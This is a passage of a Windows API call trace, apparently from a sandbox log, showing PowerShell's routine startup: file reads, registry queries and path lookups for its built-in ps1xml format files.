	[0758.677] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.677] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.677] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.678] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.678] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.679] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.679] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.685] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.686] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.686] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.686] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.687] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.687] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.688] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.688] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.688] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1b4, lpOverlapped=0x0) returned 1
	[0758.688] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x0, lpOverlapped=0x0) returned 1
	[0758.689] CloseHandle (hObject=0x318) returned 1
	[0758.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0758.689] SetErrorMode (uMode=0x1) returned 0x1
	[0758.689] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecf40 | out: lpFileInformation=0x1ecf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0758.689] SetErrorMode (uMode=0x1) returned 0x1
	[0758.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0758.690] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed028 | out: phkResult=0x1ed028*=0x318) returned 0x0
	[0758.690] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecfac, lpData=0x0, lpcbData=0x1ecfa8*=0x0 | out: lpType=0x1ecfac*=0x1, lpData=0x0, lpcbData=0x1ecfa8*=0x56) returned 0x0
	[0758.690] CoTaskMemAlloc (cb=0x5a) returned 0x47f160
	[0758.690] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecf7c, lpData=0x47f160, lpcbData=0x1ecf78*=0x56 | out: lpType=0x1ecf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecf78*=0x56) returned 0x0
	[0758.690] CoTaskMemFree (pv=0x47f160) 
	[0758.690] RegCloseKey (hKey=0x318) returned 0x0
	[0758.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0758.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0766.083] VirtualQuery (in: lpAddress=0x1ebd10, lpBuffer=0x1ecbd0, dwLength=0x30 | out: lpBuffer=0x1ecbd0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0768.087] VirtualQuery (in: lpAddress=0x1ebd10, lpBuffer=0x1ecbd0, dwLength=0x30 | out: lpBuffer=0x1ecbd0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0768.088] VirtualQuery (in: lpAddress=0x1ebd10, lpBuffer=0x1ecbd0, dwLength=0x30 | out: lpBuffer=0x1ecbd0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0768.090] VirtualQuery (in: lpAddress=0x1ebd10, lpBuffer=0x1ecbd0, dwLength=0x30 | out: lpBuffer=0x1ecbd0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0768.091] VirtualQuery (in: lpAddress=0x1ebd10, lpBuffer=0x1ecbd0, dwLength=0x30 | out: lpBuffer=0x1ecbd0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0768.094] VirtualQuery (in: lpAddress=0x1ebd10, lpBuffer=0x1ecbd0, dwLength=0x30 | out: lpBuffer=0x1ecbd0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0770.728] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0770.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0770.728] CoTaskMemFree (pv=0x41ef10) 
	[0771.424] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed1c8 | out: phkResult=0x1ed1c8*=0x1c0) returned 0x0
	[0771.424] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x1ed1dc, lpData=0x0, lpcbData=0x1ed1d8*=0x0 | out: lpType=0x1ed1dc*=0x1, lpData=0x0, lpcbData=0x1ed1d8*=0x74) returned 0x0
	[0771.425] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x1ed14c, lpData=0x0, lpcbData=0x1ed148*=0x0 | out: lpType=0x1ed14c*=0x1, lpData=0x0, lpcbData=0x1ed148*=0x74) returned 0x0
	[0771.425] CoTaskMemAlloc (cb=0x78) returned 0x402870
	[0771.425] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x1ed11c, lpData=0x402870, lpcbData=0x1ed118*=0x74 | out: lpType=0x1ed11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed118*=0x74) returned 0x0
	[0771.425] CoTaskMemFree (pv=0x402870) 
	[0771.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0771.425] SetErrorMode (uMode=0x1) returned 0x1
	[0771.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0775.426] SetErrorMode (uMode=0x1) returned 0x1
	[0775.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0775.428] SetErrorMode (uMode=0x1) returned 0x1
	[0775.428] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0775.428] SetErrorMode (uMode=0x1) returned 0x1
	[0775.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0775.428] SetErrorMode (uMode=0x1) returned 0x1
	[0775.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0775.429] SetErrorMode (uMode=0x1) returned 0x1
	[0775.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0775.429] SetErrorMode (uMode=0x1) returned 0x1
	[0775.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0775.429] SetErrorMode (uMode=0x1) returned 0x1
	[0775.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0775.430] SetErrorMode (uMode=0x1) returned 0x1
	[0775.430] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0775.430] SetErrorMode (uMode=0x1) returned 0x1
	[0775.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0775.430] SetErrorMode (uMode=0x1) returned 0x1
	[0775.430] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0775.430] SetErrorMode (uMode=0x1) returned 0x1
	[0775.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0775.430] SetErrorMode (uMode=0x1) returned 0x1
	[0775.431] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0775.431] SetErrorMode (uMode=0x1) returned 0x1
	[0775.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0775.431] SetErrorMode (uMode=0x1) returned 0x1
	[0775.431] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0775.431] SetErrorMode (uMode=0x1) returned 0x1
	[0775.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0775.431] SetErrorMode (uMode=0x1) returned 0x1
	[0775.431] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0775.432] SetErrorMode (uMode=0x1) returned 0x1
	[0775.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0775.432] SetErrorMode (uMode=0x1) returned 0x1
	[0775.432] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0a0 | out: lpFileInformation=0x1ed0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0775.432] SetErrorMode (uMode=0x1) returned 0x1
	[0775.433] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0775.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.433] CoTaskMemFree (pv=0x41ef10) 
	[0775.446] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0775.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.446] CoTaskMemFree (pv=0x41ef10) 
	[0775.447] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0775.447] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.447] CoTaskMemFree (pv=0x41ef10) 
	[0775.449] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0775.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.449] CoTaskMemFree (pv=0x41ef10) 
	[0775.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0775.451] SetErrorMode (uMode=0x1) returned 0x1
	[0775.451] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0775.451] GetFileType (hFile=0x314) returned 0x1
	[0775.451] SetErrorMode (uMode=0x1) returned 0x1
	[0775.451] GetFileType (hFile=0x314) returned 0x1
	[0775.451] ReadFile (in: hFile=0x314, lpBuffer=0x33bb370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33bb370*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0775.455] ReadFile (in: hFile=0x314, lpBuffer=0x33bb370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33bb370*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0775.455] ReadFile (in: hFile=0x314, lpBuffer=0x33bb370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33bb370*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0775.455] ReadFile (in: hFile=0x314, lpBuffer=0x33bb370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33bb370*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0775.456] ReadFile (in: hFile=0x314, lpBuffer=0x33bb370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33bb370*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0775.456] ReadFile (in: hFile=0x314, lpBuffer=0x33bb370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33bb370*, lpNumberOfBytesRead=0x1ecd38*=0x1000, lpOverlapped=0x0) returned 1
	[0775.457] ReadFile (in: hFile=0x314, lpBuffer=0x33bb370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33bb370*, lpNumberOfBytesRead=0x1ecd38*=0x9e2, lpOverlapped=0x0) returned 1
	[0775.457] ReadFile (in: hFile=0x314, lpBuffer=0x33ba8ba, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33ba8ba*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0775.457] ReadFile (in: hFile=0x314, lpBuffer=0x33bb370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd38, lpOverlapped=0x0 | out: lpBuffer=0x33bb370*, lpNumberOfBytesRead=0x1ecd38*=0x0, lpOverlapped=0x0) returned 1
	[0775.457] CloseHandle (hObject=0x314) returned 1
	[0775.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0775.457] SetErrorMode (uMode=0x1) returned 0x1
